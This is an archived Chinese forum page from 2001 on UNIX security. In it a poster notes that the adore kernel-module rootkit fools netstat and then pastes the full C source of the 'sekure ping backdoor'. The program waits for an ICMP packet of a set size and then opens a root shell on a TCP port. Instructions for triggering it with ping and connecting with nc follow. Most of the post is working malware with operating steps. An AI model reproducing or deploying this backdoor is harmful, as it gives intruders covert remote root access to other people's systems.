📄 458.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="321.htm">上一层</a>][<a href="459.htm">下一篇</a>]
<hr><p align="left"><small>---------------------------------------------------------------------------- <br>
---- <br>
scz 于 2001-3-16 9:27:08 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统安全 <br>
: <br>
adore比knark还糟糕些,而且对抗netstat的时候根本就是糊弄人,如果 <br>
管理员怀疑有这个LLKM存在,应该 <br>
cp netstat mynetstat <br>
mynetstat -nap <br>
此外,这个ping backdoor的原始样子 <br>
/* <br>
* sekure ping backdoor for linux. (Sep 13, 1998) <br>
* <br>
* <br>
* usage: <br>
* ./ping-back packet_size port <br>
* <br>
* | `-> port to bind the shell. <br>
* `-> you'll use this number to start the shell. <br>
* <br>
* to start the shell: ping host -s packet_size <br>
* <br>
* <br>
* coded by jamez. e-mail: jamez@sekure.org <br>
* <br>
* http://www.sekure.org <br>
* <br>
*/ <br>
#include <signal.h> <br>
#include <netinet/ip.h> <br>
#include <netdb.h> <br>
int SIZEPACK, PORT; <br>
void child_kill() <br>
{ <br>
wait(NULL); <br>
signal(SIGCHLD, child_kill); <br>
} <br>
int bind_shell() <br>
{ <br>
int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid; <br>
struct sockaddr_in serv_addr; <br>
struct sockaddr_in client_addr; <br>
setuid(0); <br>
setgid(0); <br>
seteuid(0); <br>
setegid(0); <br>
setegid(0); <br>
chdir("/"); <br>
soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); <br>
if (soc_des == -1) <br>
exit(-1); <br>
bzero((char *) &serv_addr,sizeof(serv_addr)); <br>
serv_addr.sin_family = AF_INET; <br>
serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); <br>
serv_addr.sin_port = htons(PORT); <br>
soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); <br>
<br>
if (soc_rc != 0) <br>
exit(-1); <br>
if (fork() != 0) <br>
exit(0); <br>
setpgrp(); <br>
if (fork() != 0) <br>
exit(0); <br>
soc_rc = listen(soc_des, 5); <br>
if (soc_rc != 0) <br>
exit(0); <br>
while (1) <br>
{ <br>
{ <br>
soc_len = sizeof(client_addr); <br>
soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); <br>
<br>
if (soc_cli < 0) <br>
exit(0); <br>
cli_pid = getpid(); <br>
server_pid = fork(); <br>
if (server_pid != 0) <br>
{ <br>
dup2(soc_cli,0); <br>
dup2(soc_cli,1); <br>
dup2(soc_cli,2); <br>
execl("/bin/sh","sh",(char *)0); <br>
close(soc_cli); <br>
return 1; <br>
} <br>
close(soc_cli); <br>
} <br>
} <br>
int main(int argc, char *argv[]) <br>
{ <br>
int s, size, fromlen; <br>
char pkt[4096]; <br>
struct protoent *proto; <br>
struct sockaddr_in from; <br>
if(argc < 3) { <br>
printf("usage: %s packet_size port (jamez@sekure.org)\n", argv[0]); <br>
exit(0); <br>
} <br>
SIZEPACK = atoi(argv[1]); <br>
PORT = atoi(argv[2]); <br>
strcpy(argv[0], (char *)strcat(argv[0], " ")); <br>
<br>
signal(SIGHUP,SIG_IGN); <br>
signal(SIGCHLD, child_kill); <br>
if (fork() != 0) exit(0); <br>
proto = getprotobyname("icmp"); <br>
if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) <br>
/* can't creat raw socket */ <br>
exit(0); <br>
/* waiting for packets */ <br>
while(1) <br>
{ <br>
do <br>
do <br>
{ <br>
fromlen = sizeof(from); <br>
if ((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *) & <br>
from, & <br>
fromlen)) < 0) <br>
printf("ping of %i\n", size-28); <br>
} while (size != SIZEPACK + 28); <br>
/* size == SIZEPACK, let's bind the shell */ <br>
switch(fork()) { <br>
case -1: <br>
continue; <br>
case 0: <br>
/* strcpy(argv[0], "-sekure working for your profit-"); */ <br>
bind_shell(); <br>
exit(0); <br>
} <br>
sleep(15); <br>
} <br>
} <br>
# backdoor 74 1524 <-- 这里比如是root身份启动,否则拒绝打开raw_socket <br>
如果用Linux的ping命令 <br>
# ping -s 74 <targetIp> <br>
# nc <targetIp> 1524 <br>
靠,简直是喂饭了。 <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="321.htm">上一层</a>][<a href="459.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -